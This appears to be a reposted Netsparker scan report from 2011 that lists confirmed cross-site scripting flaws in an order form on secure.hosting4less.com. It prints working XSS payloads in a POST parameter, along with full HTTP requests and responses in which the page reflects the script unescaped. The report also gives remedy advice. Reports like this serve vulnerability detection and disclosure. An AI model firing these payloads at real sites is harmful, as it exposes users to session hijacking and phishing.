The DORK Report

Loading

Netsparker, Web Application Security Scanner

XSS, secure.hosting4less.com, Cross Site Scripting, Javacript Injection, CWE-79

Netsparker - Scan Report Summary
TARGET URL
https://secure.hosting4less.com/dialup4less.c...
SCAN DATE
2/17/2011 9:18:10 PM
REPORT DATE
2/18/2011 10:05:06 AM
SCAN DURATION
01:16:35

Total Requests

Redcted

Average Speed

Redacted req/sec.
9
identified
8
confirmed
0
critical
2
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
67 %
LOW
11 %
INFORMATION
22 %
Cross-site Scripting

Cross-site Scripting

6 TOTAL
IMPORTANT
CONFIRMED
6
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /dialup4less.com/cgi-bin/order.cgi

/dialup4less.com/cgi-bin/order.cgi CONFIRMED

https://secure.hosting4less.com/dialup4less.com/cgi-bin/order.cgi

Parameters

Parameter Type Value
cour_listfields POST value
cour_top POST Thank you for signing up with Dialup 4 Less.com The following is the information that was filled out on our online order form. You wil be receiving a phone call to verify this order from our company. Please also reply back to this email confirming that the information is correct. Confirmation Info:
html_redirect POST http://www.dialup4less.com/thankyou.html
cour_send POST value
print_blank_fields POST value
required POST '"--></style></script><script>alert(0x000311)</script>
cour_bottom POST Thank You for choosing Dialup 4 Less.com. We look forward to providing you with the best service possible. You will be receiving your login information in another email shortly. Be advised, all accounts automatically renew until canceled by faxing or emailing us a cancelation notice prior to renewal date.
cour_close POST Sincerely,
cour_myname POST Dialup 4 Less.com
cour_myemail POST order@dialup4less.com
cour_mywebsite POST http://www.dialup4less.com
mail_subject POST Dialup 4 Less.com Account Sign Up
mail_recipient POST order@dialup4less.com
mail_listfields POST value
env_report POST REMOTE_HOST,REMOTE_ADDR,HTTP_USER_AGENT
DESIREDUSERNAME POST Ronald Smith
DESIREDPASSWORD POST 3
NAME POST Ronald Smith
ORGANIZATION POST 3
ADDRESS POST 3
CITY POST 3
STATE POST Select a State/province
ZIP POST 3
COUNTRY POST United States
PHONE POST 3
MOBILE-NUMBER POST 3
FAX POST 3
email POST netsparker@example.com
REPRESENTATIVE POST 3
PROMOTION-CODE POST 3
REFERER POST 3
CARD-HOLDER-NAME POST Ronald Smith
CREDIT-CARD-NUMBER POST 3
Credit+Card+Type POST SelectPlan
CREDIT-CARD-EXPIRATION POST selectmonth
CreditCard+Billing+Address POST 3
billingcity POST 3
billingstate POST 3
CreditCard+Billing+ZipCode POST 3
AGREEMENT POST 1. INTRODUCTION: Dialup 4 Less.com provides its Nationwide Internet Access, as they may exist from time to time ("Services"), to users who pay a quarterly, semi annual or annual service fee to subscribe to the Services ("Members"). By establishing an account, you agree to be bound by this Agreement and to use the Services in compliance with this Agreement, our Acceptable Use Policy and other policies. If you do not agree to the terms and conditions of this Agreement, including any future revisions, we suggest you not use our Services. If you are a current Member, please terminate your use of the Services under Section 6. 2. SUBSCRIPTION REQUIREMENTS: Members must be at least 18 years old. Local access dial-up numbers may not be available in all areas. You are solely responsible for determining if use of a particular dial-up number will cause you to incur long-distance, toll or other charges. Dialup 4 Less.com is not responsible for any long-distance, toll or other telecommunications charges you incur. Current prices for Dialup 4 Less.com Services are posted throughout our website at http://www.dialup4less.com These rates may also be obtained by calling (888) 818-0444 8am to 6pm weekdays, Pacific Standard Time. Dialup 4 Less.com reserves the right to change prices, policies and institute new fees and or policies at any time. 3. PAYMENT OBLIGATIONS OF A MEMBER. A. Members must provide Dialup 4 Less.com with accurate and complete billing information including legal name, address, telephone number, and credit card/billing information. B. Report to Dialup 4 Less.com all changes to this information within five (5) days of the change. Members are responsible for any changes to their account. C. Members having questions regarding charges to an account, should contact Dialup 4 Less's Billing Department at (888) 818-0444 8am to 6pm weekdays Pacific Standard Time. 4. CREDIT CARD ACCOUNTS: All charges are automatically billed to the member's credit card on the day of sign up and the first day of each billing anniversary month from that point on until the account is cancelled. Once an account is set up, all recurring billing will be on the first of the month. regardless of the day they sign up. You will be billed quarterly , semi annual or annual depending on the selection you chose when you signed up. In the event the credit card is declined by your Bank, the customer will be notified by email or phone to the email/phone number on file. Past due accounts that are not brought current within 5 days of the notice are subject to suspension and possible account termination. There will be a $20 Re-Activation Fee on any accounts suspended and then later re-activated. All payments are non-refundable, there are no refunds expressed or implied with this service. The company listed on the credit card statement will be Hosting 4 Less. Dialup 4 Less.com will not be responsible for any charges or expenses (e.g for overdrawn accounts, exceeding credit card limits, etc.) resulting from charges billed by Dialup 4 Less.com. 5. TERM OF AGREEMENT: Continued use of the Services constitutes acceptance of this Agreement and any future versions. If you are dissatisfied with the Services or any related terms, conditions, rules, policies, guidelines, or practices, your sole and exclusive remedy is to discontinue using the Services by terminating your account. 6. CANCELLATION: You may terminate your account at any time and for any reason by providing notice of intent to terminate to Dialup 4 Less.com by: A. Fax: Send a Fax In Writing To Dialup 4 Less.com at (818) 773-8023 With Your UserName & Password. B. Email: billing@dialup4less.com. C. To protect you and for security purposes, all requests for cancellations or changes will require your user name and password. Dialup 4 Less.com may terminate this Agreement, your password, your account, or your use of the Services, for any reason, including, without limitation, if Dialup 4 Less.com, in its sole discretion, believes you have violated this Agreement, our Acceptable Use Policy, or any of the applicable user policies. Dialup 4 Less.com will provide a termination notice to you by: email addressed to your email account. All notices to you shall be deemed effective immediately. Sections 3, 9, 10, and 12 of this Agreement shall survive termination of this Agreement. 7. ACCOUNT, PASSWORD, AND SECURITY: You must keep your password confidential so that no one else may access the Services through your account. Sharing your account is prohibited, your account is for your exclusive use only. You must notify Dialup 4 Less.com immediately upon discovering any unauthorized use of your account. 8. EXTENT OF USE: An "Unlimited" access account does not constitute a dedicated connection. Dialup 4 Less.com intends it to be for an unlimited amount of time "manually" making use of the connection (ie: a individual human being sitting at a computer). This service is intended for reasonable usage. Dialup 4 Less.com employs a 10 minute inactivity timer as well as a 5 hour network cutoff timer to ensure fair access to all customers. Anyone attempting to remain on line continuously by automatically redialing after being disconnected may be cancelled in order to protect our network resources and maintain Service availability for others. 9. EMAIL USE AND SPAM: Email accounts are limited to 50MB in terms of storage. It is suggested that Emails be downloaded each time mail is fetched and stored on the server for no longer than 60 days. Dialup 4 Less.com is not responsible for any email that is lost. Using a Dialup 4 Less.com account for the purposes of sending SPAM is prohibited. Tampering with the return address or route report on an email message or Usenet newsgroup is prohibited. Anonymous transmission of any sort is prohibited. SPAM is defined as any unwanted and unsolicited transmission of data through email and usenet newsgroups. It includes but is not limited to: advertisements for goods or services, chain letters and multi-level marketing, off topic postings to mailing lists or newsgroups, any message sent to more than 5 newsgroups or 3 list owners. Any violations will be considered a breach of this agreement and will result in the immediate cancellation of all services without warning. 10. AVAILABILITY OF THE SERVICES: Dialup 4 Less.com may change its POP numbers at any time. Dialup 4 Less.com reserves the right to direct Members to use certain numbers to access the Service or to restrict use of specific access numbers. User names, passwords and email addresses are Dialup 4 Less's property and Dialup 4 Less.com may alter or replace them at any time. 11. PRIVACY POLICY: Dialup 4 Less.com will not give out your email address and/or personal information to any 3rd party entity, with the exception that if Dialup 4 Less.com is acquired, it may have to provide this information to the purchaser of the business so they can continue providing service to you. 12. DISCLAIMER OF WARRANTIES and LIMITATION OF LIABILITY. EXCEPT FOR CERTAIN PRODUCTS AND SERVICES SPECIFICALLY IDENTIFIED AS BEING OFFERED BY DialUp 4 Less.com. Dialup 4 Less.com does not control any materials, information, products, or services on the internet. The internet contains unedited materials, some of which are sexually explicit or may be offensive to you. Dialup 4 Less.com has no control over and accepts no responsibility for such materials. You assume full responsibility and risk for use of the services and the internet and are solely responsible for evaluating the accuracy, completeness, and usefulness of all services, products, and other information, and the quality and merchantability of all merchandise provided through the service or the internet. The services are provided on an "as is" and "as available" basis. Dialup 4 Less.com does not warrant that the services will be uninterrupted, error-free, or free of viruses or other harmful components. Dialup 4 Less.com makes no express warranties and waives all implied warranties including, but not limited to, warranties of title, noninfringement, merchantability, and fitness for a particular purpose regarding any merchandise, information or service provided through Dialup 4 Less.com or the internet generally. No advice or information given by Dialup 4 Less.com or its representatives shall create a warranty. Dialup 4 Less.com and its employees are not liable for any costs or damages arising directly or indirectly from your use of the services or the internet including any indirect, incidental, exemplary, multiple, special, punitive, or consequential damages. In any event, DialUp 4 Less's cumulative liability to any member for any and all claims relating to the use of the services shall not exceed the total amount of service fees paid during a one month period. 13. Indemnification: Customer agrees that it shall defend, indemnify, save and hold Dialup 4 Less harmless from any and all demands, liabilities, losses, costs and claims, including reasonable attorney's fees asserted against Dialup 4 Less.com, its agents, its customers, officers and employees, that may arise or result from any service provided or performed or agreed to be performed or any product sold by customer, its agents, employees or assigns. Customer agrees to defend, indemnify and hold harmless Dialup 4 Less.com against liabilities arising out of: (1) Any injury to person or property caused by any products sold or otherwise distributed in connection with Dialup 4 Less's server; (2) Any material supplied by customer infringing or allegedly infringing on the proprietary rights of a third party; (3) Copyright infringement and (4) Any defective products sold to customer from Dialup 4 Less 's server. 14. MISCELLANEOUS: This Agreement, and Dialup 4 Less's other user policies posted on Dialup 4 Less's Web site constitute the entire agreement between you and Dialup 4 Less.com with respect to your use of the Services. Dialup 4 Less.com may revise, amend, or modify this Agreement, and any other user policies and agreements, at any time and in any manner without prior notice.
INITIALS POST 3

Request

POST /dialup4less.com/cgi-bin/order.cgi HTTP/1.1
Referer: https://secure.hosting4less.com/dialup4less.com/order.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.hosting4less.com
Content-Length: 12744
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

cour_listfields=value&cour_top=Thank+you+for+signing+up+with+Dialup+4+Less.com++The+following+is+%0d%0athe+information+that+was+filled+out+on+our+online+order+form.++You+wil+be+receiving+a+phone+call+to+verify+this+order+from+our+company.%0d%0aPlease+also+reply+back+to+this+email+confirming+that+the+information+is+correct.%0d%0a%0d%0aConfirmation+Info%3a&html_redirect=http%3a%2f%2fwww.dialup4less.com%2fthankyou.html&cour_send=value&print_blank_fields=value&required='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000311)%3c%2fscript%3e&cour_bottom=Thank+You+for+choosing+Dialup+4+Less.com.+We+look+forward+to+providing+you+with+the+best+service+possible.++You+will+be+receiving+your+login+%0d%0ainformation+in+another+email+shortly.++Be+advised%2c+all+accounts+automatically+renew+until+canceled+by+faxing+or+emailing+us+a+cancelation+notice+prior+to+renewal+date.&cour_close=Sincerely%2c&cour_myname=Dialup+4+Less.com&cour_myemail=order%40dialup4less.com&cour_mywebsite=http%3a%2f%2fwww.dialup4less.com&mail_subject=Dialup+4+Less.com+Account+Sign+Up&mail_recipient=order%40dialup4less.com&mail_listfields=value&env_report=REMOTE_HOST%2cREMOTE_ADDR%2cHTTP_USER_AGENT&DESIREDUSERNAME=Ronald+Smith&DESIREDPASSWORD=3&NAME=Ronald+Smith&ORGANIZATION=3&ADDRESS=3&CITY=3&STATE=Select+a+State%2fprovince&ZIP=3&COUNTRY=United+States&PHONE=3&MOBILE-NUMBER=3&FAX=3&email=netsparker%40example.com&REPRESENTATIVE=3&PROMOTION-CODE=3&REFERER=3&CARD-HOLDER-NAME=Ronald+Smith&CREDIT-CARD-NUMBER=3&Credit+Card+Type=SelectPlan&CREDIT-CARD-EXPIRATION=selectmonth&CreditCard+Billing+Address=3&billingcity=3&billingstate=3&CreditCard+Billing+ZipCode=3&AGREEMENT=1.+INTRODUCTION%3a%0d%0aDialup+4+Less.com+provides+its+Nationwide+Internet+Access%2c+as+they+may+exist+from+time+to+time+(%22Services%22)%2c+to+users+%0d%0awho+pay+a+quarterly%2c+semi+annual+or+annual+service+fee+to+subscribe+to+the+Services+(%22Members%22).+By+establishing+an+account%2c+you+agree+to+be+bound+by+this+Agreement+and+to+use+%0d%0athe+Services+in+compliance+with+this+Agreement%2c+our+Acceptable+Use+Policy+and+other+policies.%0d%0a%0d%0aIf+you+do+not+agree+to+the+terms+and+conditions+of+this+Agreement%2c+including+any+future+revisions%2c+we+suggest+you+not+use+our+Services.+If+you+are+a+%0d%0acurrent+Member%2c+please+terminate+your+use+of+the+Services+under+Section+6.%0d%0a%0d%0a2.+SUBSCRIPTION+REQUIREMENTS%3a%0d%0aMembers+must+be+at+least+18+years+old.+Local+access+dial-up+numbers+may+not+be+available+in+all+areas.+You+are+solely+responsible+for+determining+if+use+%0d%0aof+a+particular+dial-up+number+will+cause+you+to+incur+long-distance%2c+toll+or+other+charges.+Dialup+4+Less.com+is+not+responsible+for+any+long-distance%2c+%0d%0atoll+or+other+telecommunications+charges+you+incur.+Current+prices+for+Dialup+4+Less.com+Services+are+posted+throughout+our+website+at+%0d%0ahttp%3a%2f%2fwww.dialup4less.com+These+rates+may+also+be+obtained+by+calling+(888)+818-0444+8am+to+6pm+weekdays%2c+Pacific+Standard+Time.+Dialup+4+Less.com+%0d%0areserves+the+right+to+change+prices%2c+policies+and+institute+new+fees+and+or+policies+at+any+time.%0d%0a%0d%0a3.+PAYMENT+OBLIGATIONS+OF+A+MEMBER.%0d%0aA.+Members+must+provide+Dialup+4+Less.com+with+accurate+and+complete+billing+information+including+legal+name%2c+address%2c+telephone+number%2c+and+credit+%0d%0acard%2fbilling+information.+%0d%0a%0d%0aB.+Report+to+Dialup+4+Less.com+all+changes+to+this+information+within+five+(5)+days+of+the+change.+Members+are+responsible+for+any+changes+to+their+%0d%0aaccount.%0d%0a%0d%0aC.+Members+having+questions+regarding+charges+to+an+account%2c+should+contact+Dialup+4+Less's+Billing+Department+at+(888)+818-0444+8am+to+6pm+weekdays+%0d%0aPacific+Standard+Time.%0d%0a%0d%0a4.+CREDIT+CARD+ACCOUNTS%3a+%0d%0aAll+charges+are+automatically+billed+to+the+member's+credit+card+on+the+day+of+sign+up+and+the+first+day+of+each+billing+anniversary+month+from+that+%0d%0apoint+on+until+the+account+is+cancelled.+Once+an+account+is+set+up%2c+all+recurring+billing+will+be+on+the+first+of+the+month.+regardless+of+the+day+they+sign+up.+You+will+be+billed+%0d%0aquarterly+%2c+semi+annual+or+annual+depending+on+the+selection+you+chose+when+you+signed+up.+In+the+event+the+credit+card+is+declined+by+your+Bank%2c+the+customer+will+be+notified+by+email+or+%0d%0aphone+to+the+email%2fphone+number+on+file.+Past+due+accounts+that+are+not+brought+current+within+5+days+of+the+notice+are+subject+to+suspension+and+possible+account+termination.+There+will+be+a+%0d%0a%2420+Re-Activation+Fee+on+any+accounts+suspended+and+then+later+re-activated.+All+payments+are+non-refundable%2c+there+are+no+refunds+expressed+or+%0d%0aimplied+with+this+service.++The+company+listed+on+the+credit+card+statement+will+be+Hosting+4+Less.+Dialup+4+Less.com+will+not+be+responsible+for+any+%0d%0acharges+or+expenses+(e.g+for+overdrawn+accounts%2c+exceeding+credit+card+limits%2c+etc.)+resulting+from+charges+billed+by+Dialup+4+Less.com.%0d%0a%0d%0a5.+TERM+OF+AGREEMENT%3a+%0d%0aContinued+use+of+the+Services+constitutes+acceptance+of+this+Agreement+and+any+future+versions.+If+you+are+dissatisfied+with+the+Services+or+any+related+%0d%0aterms%2c+conditions%2c+rules%2c+policies%2c+guidelines%2c+or+practices%2c+your+sole+and+exclusive+remedy+is+to+discontinue+using+the+Services+by+terminating+your+%0d%0aaccount.%0d%0a%0d%0a6.+CANCELLATION%3a+%0d%0aYou+may+terminate+your+account+at+any+time+and+for+any+reason+by+providing+notice+of+intent+to+terminate+to+Dialup+4+Less.com+by%3a+%0d%0a%0d%0aA.++Fax%3a++Send+a+Fax+In+Writing+To+Dialup+4+Less.com+at+(818)+773-8023+With+Your+UserName+%26+Password.%0d%0a%0d%0aB.+Email%3a+billing%40dialup4less.com.%0d%0a%0d%0aC.+To+protect+you+and+for+security+purposes%2c+all+requests+for+cancellations+or+changes+will+require+your+user+name+and+password.+Dialup+4+Less.com+may+%0d%0aterminate+this+Agreement%2c+your+password%2c+your+account%2c+or+your+use+of+the+Services%2c+for+any+reason%2c+including%2c+without+limitation%2c+if+Dialup+4+Less.com%2c+%0d%0ain+its+sole+discretion%2c+believes+you+have+violated+this+Agreement%2c+our+Acceptable+Use+Policy%2c+or+any+of+the+applicable+user+policies.+Dialup+4+Less.com+%0d%0awill+provide+a+termination+notice+to+you+by%3a+email+addressed+to+your+email+account.+All+notices+to+you+shall+be+deemed+effective+immediately.+Sections+%0d%0a3%2c+9%2c+10%2c+and+12+of+this+Agreement+shall+survive+termination+of+this+Agreement.%0d%0a%0d%0a7.+ACCOUNT%2c+PASSWORD%2c+AND+SECURITY%3a%0d%0aYou+must+keep+your+password+confidential+so+that+no+one+else+may+access+the+Services+through+your+account.+Sharing+your+account+is+prohibited%2c+your+%0d%0aaccount+is+for+your+exclusive+use+only.+You+must+notify+Dialup+4+Less.com+immediately+upon+discovering+any+unauthorized+use+of+your+account.%0d%0a%0d%0a%0d%0a8.+EXTENT+OF+USE%3a+%0d%0aAn+%22Unlimited%22+access+account+does+not+constitute+a+dedicated+connection.+Dialup+4+Less.com+intends+it+to+be+for+an%0d%0aunlimited+amount+of+time+%22manually%22+making+use+of+the+connection+(ie%3a+a+individual+human+being+sitting+at+a+computer).++This+service+is+intended%0d%0afor+reasonable+usage.++Dialup+4+Less.com+employs+a+10+minute+inactivity+%0d%0atimer+as+well+as+a+5+hour+network+cutoff+timer+to+ensure+fair%0d%0aaccess+to+all+customers.+Anyone+attempting+to+remain+on+line+continuously+by+automatically+redialing+after+being+disconnected+may+be+cancelled+in+order+%0d%0ato+protect+our+network+resources+and+maintain+Service+availability+for+%0d%0aothers.%0d%0a%0d%0a9.+EMAIL+USE+AND+SPAM%3a%0d%0aEmail+accounts+are+limited+to+50MB+in+terms+of+storage.++It+is+suggested+that+Emails+be+downloaded+each+time+mail+is+%0d%0afetched+and+stored+on+the+server+for+no+longer+than+60+days.+Dialup+4+Less.com+is+not+responsible+for+any+email+that+is+lost.%0d%0a%0d%0aUsing+a+Dialup+4+Less.com+account+for+the+purposes+of+sending+SPAM+is+prohibited.+Tampering+with+%0d%0athe+return+address+or+route+report+on+an+email+message+or+Usenet+newsgroup+is+prohibited.+Anonymous+transmission+of+any+sort+is+prohibited.%0d%0a%0d%0aSPAM+is+defined+as+any+unwanted+and+unsolicited+transmission+of+data+through+email+and+usenet+newsgroups.+It+includes+but+is+not+limited+to%3a+%0d%0aadvertisements+for+goods+or+services%2c+chain+letters+and+multi-level+marketing%2c+off+topic+postings+to+mailing+lists+or+newsgroups%2c+any+message+sent+to+%0d%0amore+than+5+newsgroups+or+3+list+owners.+%0d%0a%0d%0aAny+violations+will+be+considered+a+breach+of+this+agreement+and+will+result+in+the+immediate+cancellation+of+all+services+without+warning.%0d%0a%0d%0a10.+AVAILABILITY+OF+THE+SERVICES%3a+%0d%0aDialup+4+Less.com+may+change+its+POP+numbers+at+any+time.+Dialup+4+Less.com+reserves+the+right+to+direct+Members+to+use+certain+numbers+to+access+the+%0d%0aService+or+to+restrict+use+of+specific+access+numbers.+User+names%2c+passwords+and+email+addresses+are+Dialup+4+Less's+property+and+Dialup+4+Less.com+may+%0d%0aalter+or+replace+them+at+any+time.%0d%0a%0d%0a%0d%0a11.+PRIVACY+POLICY%3a+%0d%0aDialup+4+Less.com+will+not+give+out+your+email+address+and%2for+personal+information+to+any+3rd+party+entity%2c+with+the+exception+that+if+Dialup+4+Less.com+%0d%0ais+acquired%2c+it+may+have+to+provide+this+information+to+the+purchaser+of+the+business+so+they+can+continue+providing+service+to+you.%0d%0a%0d%0a%0d%0a12.+DISCLAIMER+OF+WARRANTIES+and+LIMITATION+OF+LIABILITY.+EXCEPT+FOR+CERTAIN+PRODUCTS+AND+SERVICES+SPECIFICALLY+IDENTIFIED+AS+BEING+OFFERED+BY+DialUp+4+%0d%0aLess.com.+%0d%0aDialup+4+Less.com+does+not+control+any+materials%2c+information%2c+products%2c+or+services+on+the+internet.+The+internet+contains+unedited+materials%2c+some+of+%0d%0awhich+are+sexually+explicit+or+may+be+offensive+to+you.+Dialup+4+Less.com+has+no+control+over+and+accepts+no+responsibility+for+such+materials.+You+%0d%0aassume+full+responsibility+and+risk+for+use+of+the+services+and+the+internet+and+are+solely+responsible+for+evaluating+the+accuracy%2c+completeness%2c+and+%0d%0ausefulness+of+all+services%2c+products%2c+and+other+information%2c+and+the+quality+and+merchantability+of+all+merchandise+provided+through+the+service+or+the+%0d%0ainternet.%0d%0a%0d%0aThe+services+are+provided+on+an+%22as+is%22+and+%22as+available%22+basis.+Dialup+4+Less.com+does+not+warrant+that+the+services+will+be+uninterrupted%2c+%0d%0aerror-free%2c+or+free+of+viruses+or+other+harmful+components.+Dialup+4+Less.com+makes+no+express+warranties+and+waives+all+implied+warranties+including%2c+%0d%0abut+not+limited+to%2c+warranties+of+title%2c+noninfringement%2c+merchantability%2c+and+fitness+for+a+particular+purpose+regarding+any+merchandise%2c+information+%0d%0aor+service+provided+through+Dialup+4+Less.com+or+the+internet+generally.+No+advice+or+information+given+by+Dialup+4+Less.com+or+its+representatives+%0d%0ashall+create+a+warranty.+Dialup+4+Less.com+and+its+employees+are+not+liable+for+any+costs+or+damages+arising+directly+or+indirectly+from+your+use+of+the+%0d%0aservices+or+the+internet+including+any+indirect%2c+incidental%2c+exemplary%2c+multiple%2c+special%2c+punitive%2c+or+consequential+damages.+In+any+event%2c+DialUp+4+%0d%0aLess's+cumulative+liability+to+any+member+for+any+and+all+claims+relating+to+the+use+of+the+services+shall+not+exceed+the+total+amount+of+service+fees+%0d%0apaid+during+a+one+month+period.%0d%0a%0d%0a13.+Indemnification%3a%0d%0aCustomer+agrees+that+it+shall+defend%2c+indemnify%2c+save+and+hold+Dialup+4+Less+harmless+from+any+and+all+demands%2c+liabilities%2c+losses%2c+costs+and+claims%2c+%0d%0aincluding+reasonable+attorney's+fees+asserted+against+Dialup+4+Less.com%2c+its+agents%2c+its+customers%2c+officers+and+employees%2c+that+may+arise+or+result+%0d%0afrom+any+service+provided+or+performed+or+agreed+to+be+performed+or+any+product+sold+by+customer%2c+its+agents%2c+employees+or+assigns.+Customer+agrees+to+%0d%0adefend%2c+indemnify+and+hold+harmless+Dialup+4+Less.com+against+liabilities+arising+out+of%3a+(1)+Any+injury+to+person+or+property+caused+by+any+products+%0d%0asold+or+otherwise+distributed+in+connection+with+Dialup+4+Less's+server%3b+(2)+Any+material+supplied+by+customer+infringing+or+allegedly+infringing+on+the+%0d%0aproprietary+rights+of+a+third+party%3b+(3)+Copyright+infringement+and+(4)+Any+defective+products+sold+to+customer+from+Dialup+4+Less+'s+server.%0d%0a%0d%0a14.+MISCELLANEOUS%3a+%0d%0aThis+Agreement%2c+and+Dialup+4+Less's+other+user+policies+posted+on+Dialup+4+Less's+Web+site+constitute+the+entire+agreement+between+you+and+Dialup+4+Less.com+with+respect+to+your+use+of+the+Services.%0d%0a%0d%0aDialup+4+Less.com+may+revise%2c+amend%2c+or+modify+this+Agreement%2c+and+any+other+user+policies+and+agreements%2c+at+any+time+and+in+any+manner+without+prior+notice.&INITIALS=3

Response

HTTP/1.0 200 OK
Date: Fri, 18 Feb 2011 03:38:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 456
Connection: close
Content-Type: text/html


<html> <head> <title>Error: Invalid Submission</title> </head> <center> <table border=0 width=600 bgcolor=#9C9C9C> <tr><th><font size=+2>Error: Invalid Submission</font></th></tr> </table> <table border=0 width=600 bgcolor=#CFCFCF> <tr><td><CENTER>The following required field(s) were invalid or blank in your submission form:<p> <ul> <li>'"--></style></script><script>netsparker(0x000311)</script> </ul> These fields must be filled in before you can successfully submit the form.<p> Please use your browser's back button to return to the form <BR> or click <a href="https://secure.hosting4less.com/dialup4less.com/order.html">here</a> for a new blank one. </CENTER> </td></tr> </table> </center> </body></html>
- /dialup4less.com/cgi-bin/order.cgi

/dialup4less.com/cgi-bin/order.cgi CONFIRMED

https://secure.hosting4less.com/dialup4less.com/cgi-bin/order.cgi

Parameters

Parameter Type Value
cour_listfields POST value
cour_top POST Thank you for signing up with Dialup 4 Less.com The following is the information that was filled out on our online order form. You wil be receiving a phone call to verify this order from our company. Please also reply back to this email confirming that the information is correct. Confirmation Info:
html_redirect POST http://www.dialup4less.com/thankyou.html
cour_send POST value
print_blank_fields POST value
required POST '"--></style></script><script>alert(0x0004CD)</script>
cour_bottom POST Thank You for choosing Dialup 4 Less.com. We look forward to providing you with the best service possible. You will be receiving your login information in another email shortly. Be advised, all accounts automatically renew until canceled by faxing or emailing us a cancelation notice prior to renewal date.
cour_close POST Sincerely,
cour_myname POST Dialup 4 Less.com
cour_myemail POST order@dialup4less.com
cour_mywebsite POST http://www.dialup4less.com
mail_subject POST Dialup 4 Less.com Account Sign Up
mail_recipient POST order@dialup4less.com
mail_listfields POST value
env_report POST REMOTE_HOST,REMOTE_ADDR,HTTP_USER_AGENT
DESIREDUSERNAME POST Ronald Smith
DESIREDPASSWORD POST 3
TERM POST PLAN: Vacation Dial-Up - Only 1 Month ($19.95 ($9.95/mo) & $10 SETUP FEE)
NAME POST Ronald Smith
ORGANIZATION POST 3
ADDRESS POST 3
CITY POST 3
STATE POST Select a State/province
ZIP POST 3
COUNTRY POST 3
PHONE POST 3
MOBILE-NUMBER POST 3
FAX POST 3
email POST netsparker@example.com
REPRESENTATIVE POST 3
PROMOTION-CODE POST 3
REFERER POST 3
CARD-HOLDER-NAME POST Ronald Smith
CREDIT-CARD-NUMBER POST 3
Credit Card Type POST SelectPlan
CREDIT-CARD-EXPIRATION POST selectyear
CreditCard Billing Address POST 3
billingcity POST 3
billingstate POST 3
CreditCard Billing ZipCode POST 3
AGREEMENT POST 1. INTRODUCTION: Dialup 4 Less.com provides its Nationwide Internet Access, as they may exist from time to time ("Services"), to users who pay a quarterly, semi annual or annual service fee to subscribe to the Services ("Members"). By establishing an account, you agree to be bound by this Agreement and to use the Services in compliance with this Agreement, our Acceptable Use Policy and other policies. If you do not agree to the terms and conditions of this Agreement, including any future revisions, we suggest you not use our Services. If you are a current Member, please terminate your use of the Services under Section 6. 2. SUBSCRIPTION REQUIREMENTS: Members must be at least 18 years old. Local access dial-up numbers may not be available in all areas. You are solely responsible for determining if use of a particular dial-up number will cause you to incur long-distance, toll or other charges. Dialup 4 Less.com is not responsible for any long-distance, toll or other telecommunications charges you incur. Current prices for Dialup 4 Less.com Services are posted throughout our website at http://www.dialup4less.com These rates may also be obtained by calling (888) 818-0444 8am to 6pm weekdays, Pacific Standard Time. Dialup 4 Less.com reserves the right to change prices, policies and institute new fees and or policies at any time. 3. PAYMENT OBLIGATIONS OF A MEMBER. A. Members must provide Dialup 4 Less.com with accurate and complete billing information including legal name, address, telephone number, and credit card/billing information. B. Report to Dialup 4 Less.com all changes to this information within five (5) days of the change. Members are responsible for any changes to their account. C. Members having questions regarding charges to an account, should contact Dialup 4 Less's Billing Department at (888) 818-0444 8am to 6pm weekdays Pacific Standard Time. 4. CREDIT CARD ACCOUNTS: All charges are automatically billed to the member's credit card on the day of sign up and the first day of each billing anniversary month from that point on until the account is cancelled. Once an account is set up, all recurring billing will be on the first of the month. regardless of the day they sign up. You will be billed quarterly , semi annual or annual depending on the selection you chose when you signed up. In the event the credit card is declined by your Bank, the customer will be notified by email or phone to the email/phone number on file. Past due accounts that are not brought current within 5 days of the notice are subject to suspension and possible account termination. There will be a $20 Re-Activation Fee on any accounts suspended and then later re-activated. All payments are non-refundable, there are no refunds expressed or implied with this service. The company listed on the credit card statement will be Hosting 4 Less. Dialup 4 Less.com will not be responsible for any charges or expenses (e.g for overdrawn accounts, exceeding credit card limits, etc.) resulting from charges billed by Dialup 4 Less.com. 5. TERM OF AGREEMENT: Continued use of the Services constitutes acceptance of this Agreement and any future versions. If you are dissatisfied with the Services or any related terms, conditions, rules, policies, guidelines, or practices, your sole and exclusive remedy is to discontinue using the Services by terminating your account. 6. CANCELLATION: You may terminate your account at any time and for any reason by providing notice of intent to terminate to Dialup 4 Less.com by: A. Fax: Send a Fax In Writing To Dialup 4 Less.com at (818) 773-8023 With Your UserName &amp; Password. B. Email: billing@dialup4less.com. C. To protect you and for security purposes, all requests for cancellations or changes will require your user name and password. Dialup 4 Less.com may terminate this Agreement, your password, your account, or your use of the Services, for any reason, including, without limitation, if Dialup 4 Less.com, in its sole discretion, believes you have violated this Agreement, our Acceptable Use Policy, or any of 